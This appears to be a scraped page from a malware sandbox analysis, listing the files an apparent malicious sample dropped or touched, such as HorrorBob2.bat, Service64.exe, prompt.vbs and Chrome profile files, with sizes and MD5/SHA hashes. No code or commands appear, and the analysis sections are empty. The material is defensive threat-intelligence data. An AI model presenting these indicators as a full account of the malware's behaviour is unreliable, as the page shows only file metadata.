2f6011455fbd67c4377f40ff17cd6a5f

SHA1
7f37aeeb11c2ec195e23b4bdbb8ad3fafad9e4e1

SHA256
d312d2a92b4af4978f712ce75fd937ce9a4b54bbfe2807f91f88f79c2abdbfba

SHA512
3dbfd33f463b4a9c592e2fc7d1a6fa16dfeff9d55891ba8736a93237d7977fe7338b4c183f2747cf3aee811042e00463022728e2f7ab2eca05f079cb4bf750e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
2283790f3da65d5d24157a2ea47f4e6e

SHA1
fce4c1bcbf4d0705a6f7a93f2c1d606c2654afa7

SHA256
25e850a171847dae17931c7361d8977c4a0a1205fb447408613c8f84ec507541

SHA512
7bbb0a814a9bf6b088681dd8b7b74a6a87c5c63658b2ff18d577a7e0a8d80dc45fb4f3394b15fbd8eba0cb3a5ca901b5146799b2ff3111a8cfec2c69dbebd33f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
b8afb8c14e79ad614023262613fdf83a

SHA1
92586585ca56fa51845694579c7a11dbe11f3323

SHA256
ea6d959a1525974567cdc31a9cd0c7dc498e3364b495c4480ac5e91c50f39c3f

SHA512
bcb499aeaea2f1596eaa571514b4652aeb23de370a1036743576198b197f53f54f1d94c854ba5ede69e2fa1f00876239f79e46efff329051f64661b01a6ed399

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
5f723ba7b0f4f69bfb8ed21e03db8075

SHA1
3f11c39aaa2043c688b20d784b77714db93e7dad

SHA256
6b926bd04f26608b228ee18cb17f5cf6c15bb5a66d206f847d888cb85c62d9f4

SHA512
20752cefa8c3689e98da9c1ec259c9311323ec95ff4efbdc924b6e690abd8e86b36e90187d4362a9e6368b6f3e63aa8a7e1c6b743c43241b4e265bc84ed170f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
98KB

MD5
b4ca8b7d55ab2d8f079c078ce64a2d7e

SHA1
6d64ca12997d7faea178ece1982230be31227a9f

SHA256
22579f649a8b3825a436958ce4751706e9fab5ffb2841e40342a6e4336a3718d

SHA512
a093b4b00a88124e2cd0356f2195fda0b47a792247df5e28a3d51f83a93dee240ce6051a0eec4246775fdcccc5bfffefe009d41ec2a1b8eb714054c36d9d48ad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5885d5.TMP

Filesize
91KB

MD5
a4b081a07b0ba943c8cfeb898122e6ae

SHA1
5e3b4ab976695c83aa5c67b32237bf54c4f47fe6

SHA256
b29d0669ab0878ac857f485f981f91396fa0024e43dc0125ab78e30bdc2a978a

SHA512
6fe7342a8a7f0e0c79032d63f59c161185d7486a8e604b466d50fc20098c6245711f3c23461d7016f99a63fc2b882f11e3d6eae6b4cfeec9d111441514ba9935

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\E1A1.tmp\HorrorBob2.bat

Filesize
5KB

MD5
b11c0b55dba339bbe3169584fa0eedd8

SHA1
8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9

SHA256
f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073

SHA512
8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

Download Submit
C:\Users\Admin\AppData\Local\Temp\E1A1.tmp\Service64.exe

Filesize
11.4MB

MD5
b53852cb556ec28efc39b986caddb791

SHA1
5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a

SHA256
ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a

SHA512
7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599

Download Submit
C:\Users\Admin\AppData\Local\Temp\E1A1.tmp\blood.bmp

Filesize
3.8MB

MD5
040d29b801e3488f7aee3f9708128eea

SHA1
433591a971325f7529cbb7a1d16645ff65ee10c7

SHA256
fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de

SHA512
79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

Download Submit
C:\Users\Admin\AppData\Local\Temp\E1A1.tmp\prompt.vbs

Filesize
207B

MD5
52ac951762c9b42fb4492dfdde2ba4ae

SHA1
0821a0dea46432fc4db10a2dc6312d42a872ab9f

SHA256
9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3

SHA512
c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 806646.crdownload

Filesize
11.9MB

MD5
9331b20120075b2685d3888c196f2e34

SHA1
1af7d3dc4576ef8aaa06fa3199cf422b7657950b

SHA256
98a804d373c7e0e4f80155df20358436e066ecf31c522c31df2ba46923ac68c2

SHA512
83636067d46b1362a6e0e5af56222d170d337fa7b0c4048b8f04c9df0ca35c3634a7254e6226886b00f9894e4353d6ac6b2e4e760bab320058cebe37c7c0cd7b

Download Submit
memory/3776-358-0x0000000000400000-0x000000000132F000-memory.dmp

Filesize
15.2MB

Download
memory/3776-388-0x0000000000400000-0x000000000132F000-memory.dmp

Filesize
15.2MB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads